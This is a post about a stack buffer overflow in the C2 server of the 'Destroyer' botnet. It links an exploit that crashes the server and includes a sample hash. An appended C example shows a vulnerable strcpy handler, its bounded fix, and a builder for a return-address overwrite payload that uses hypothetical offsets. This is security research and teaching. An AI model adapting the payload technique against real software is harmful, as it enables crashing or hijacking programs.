So, there's a Chinese botnet package known as "Destroyer" (破坏者).

It, ironically, can itself be destroyed, thanks to a stack buffer overflow.

I wasn't able to get full RCE, but a jump to "call ExitProcess" should be enough, no? It can be triggered directly after "start DDoS", for even more lulz.

Here's the exploit: https://gist.github.com/Wack0/d0aa7f56d5d044fb918056207d2149b1

And here's a bot sample hash: b17535de8061dce3d6630e92d601ebe1ebac44ed52b3a04a8bb72f6661f23d44

Let's #destroythedestroyer :)

#infosec #botnet #exploit

Kill a "破坏者Lv5.0" / "Destroyer Lv5.0" C2 server

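To make the bug class concrete, here is an added example (written for this page, not code from the post, the linked gist, or the Destroyer C2 itself) of the pattern the post describes: a C2 handler copying an attacker-controlled bot reply into a fixed-size stack buffer, the bounded version that closes the hole, and a builder for the "overwrite the return address with the address of an existing call ExitProcess" payload. The buffer size (64), return-address offset (68), target address (0x00401234) and 32-bit little-endian layout are all hypothetical assumptions; on the real binary they would come from a debugger session.

```c
/* Added example: model of a stack buffer overflow in a C2 reply handler.
 * Everything below (sizes, offsets, addresses) is hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REPLY_BUF 64   /* assumed size of the handler's stack buffer */

/* Vulnerable shape: no length check, so a reply longer than REPLY_BUF
 * runs past buf into the saved frame pointer and return address. */
void handle_reply_vuln(const char *reply)
{
    char buf[REPLY_BUF];
    strcpy(buf, reply);               /* stack buffer overflow */
    printf("bot says: %s\n", buf);
}

/* Hardened shape: reject anything that would not fit, copy bounded. */
int handle_reply_fixed(const char *reply, size_t len)
{
    char buf[REPLY_BUF];
    if (len >= sizeof buf)
        return -1;                    /* oversized reply dropped */
    memcpy(buf, reply, len);
    buf[len] = '\0';
    return 0;
}

/* Builds the classic overwrite: ret_off bytes of padding, then the address
 * of an existing "call ExitProcess" so the C2 just exits (no shellcode).
 * Because the vulnerable copy is strcpy, a NUL byte inside the address
 * would truncate the payload; a NUL as the final (highest) byte is allowed
 * because it doubles as the string terminator. Returns the payload length
 * written to out, or 0 if it does not fit or contains a bad byte. */
size_t build_exit_payload(uint8_t *out, size_t cap, size_t ret_off, uint32_t target)
{
    size_t len = ret_off + 4;
    if (len + 1 > cap)
        return 0;
    memset(out, 'A', ret_off);        /* filler up to the saved return address */
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(target >> (8 * i));
        if (b == 0 && i != 3)
            return 0;                 /* embedded NUL would stop strcpy early */
        out[ret_off + i] = b;         /* little-endian x86 assumed */
    }
    out[len] = '\0';
    return len;
}

/* Demo helpers with hypothetical values: 64-byte buffer + 4-byte saved EBP
 * puts the return address at offset 68; 0x00401234 stands in for the
 * address of a "call ExitProcess" instruction in the C2 image. */
uint8_t g_payload[128];

size_t demo_payload(void)
{
    return build_exit_payload(g_payload, sizeof g_payload, 68, 0x00401234u);
}

int demo_fixed_rejects_overflow(void)
{
    char big[100];
    memset(big, 'B', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return handle_reply_fixed(big, sizeof big - 1) == -1 &&
           handle_reply_fixed("ok", 2) == 0;
}

int main(void)
{
    size_t n = demo_payload();
    printf("payload length: %zu, fixed handler rejects overflow: %d\n",
           n, demo_fixed_rejects_overflow());
    return 0;
}
```

The payload builder is deliberately strict about NUL bytes: with a default 0x00400000 image base the top byte of any in-image address is zero, which only works here because it lands last and terminates the copy. Feeding `g_payload` to `handle_reply_vuln` would corrupt the stack (and is undefined behaviour in the demo), which is exactly why the fixed handler checks `len` before copying.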